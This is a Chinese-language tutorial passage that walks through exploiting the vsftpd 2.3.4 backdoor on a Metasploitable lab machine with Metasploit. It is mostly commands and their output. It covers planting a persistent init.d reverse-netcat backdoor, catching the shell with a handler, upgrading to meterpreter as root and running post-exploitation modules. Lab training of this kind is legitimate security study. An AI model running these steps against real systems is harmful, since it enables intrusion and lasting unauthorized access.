1.1.1 攻击2.3.4版本FTP服务
1.1.1.1 扫描FTP版本
参见 FTP扫描章节
1.1.1.2 查找漏洞攻击模块
msf6 > search vsftpd type:exploit
1.1.1.3 使用和配置攻击模块
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor [*] No payload configured, defaulting to cmd/unix/interact msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show options
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 192.168.1.120 RHOSTS => 192.168.1.120
1.1.1.4 攻击并验证结果
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit
1.1.1.5 进行后渗透(后续持久化连接)
msf6 > search persistence
msf6 > use exploit/linux/local/service_persistence [*] No payload configured, defaulting to cmd/unix/reverse_netcat msf6 exploit(linux/local/service_persistence) > show options
msf6 exploit(linux/local/service_persistence) > show targets
# 低版本服务器设置为System V,高版本可以设置为systemd,或者根据服务器系统类型进行设置 msf6 exploit(linux/local/service_persistence) > set target System V target => System V # 设置已经建立连接的并且想要持久化连接的session msf6 exploit(linux/local/service_persistence) > set SESSION 1 SESSION => 1 # 设置shell脚本名称,在被攻击服务器的/usr/local/bin目录下,若不设置则随机生成名称 msf6 exploit(linux/local/service_persistence) > set SHELL_NAME autoStart SHELL_NAME => autoStart # 设置服务脚本名称,在被攻击服务器的/etc/init.d/目录下,若不设置则随机生成名称 msf6 exploit(linux/local/service_persistence) > set SERVICE CMD SERVICE => CMD msf6 exploit(linux/local/service_persistence) > exploit
1.1.1.6 msf使用和persistence相同的payload进行监听
msf6 > use exploit/multi/handler [*] Using configured payload generic/shell_reverse_tcp msf6 exploit(multi/handler) > set payload cmd/unix/reverse_netcat payload => cmd/unix/reverse_netcat msf6 exploit(multi/handler) > set LHOST 192.168.10.180 LHOST => 192.168.10.180 msf6 exploit(multi/handler) > exploit
1.1.1.7 重启被攻击服务器验证
# 将shell提权为meterpreter,shell体积小,传输快,容易连接成功,成功后再提权到meterpreter增加功能 msf6 exploit(multi/handler) > sessions -u 1
msf6 exploit(multi/handler) > sessions -i 2 [*] Starting interaction with 2... meterpreter > getuid Server username: root meterpreter > sysinfo Computer : metasploitable.localdomain OS : Ubuntu 8.04 (Linux 2.6.24-16-server) Architecture : i686 BuildTuple : i486-linux-musl Meterpreter : x86/linux meterpreter > run post/linux/gather/
meterpreter > run post/linux/gather/checkvm [*] Gathering System info .... [+] This appears to be a 'KVM' virtual machine # 查看生成的后门服务和启动脚本 meterpreter > cd /usr/local/bin/ meterpreter > ls Listing: /usr/local/bin ======================= Mode Size Type Last modified Name ---- ---- ---- ------------- ---- 100711/rwx--x--x 104 fil 2022-06-09 15:03:06 +0800 sOLIy meterpreter > cd /etc/init.d/ meterpreter > ls -ltr Listing: /etc/init.d ==================== Mode Size Type Last modified Name ---- ---- ---- ------------- ---- 100755/rwxr-xr-x 1839 fil 2022-06-09 15:03:07 +0800 ZAyWaZM 100755/rwxr-xr-x 429 fil 2012-05-14 13:33:42 +0800 distcc 100755/rwxr-xr-x 6860 fil 2008-12-08 03:13:14 +0800 tomcat5.5 meterpreter > background [*] Backgrounding session 2...
我的微信
如果有技术上的问题可以扫一扫我的微信
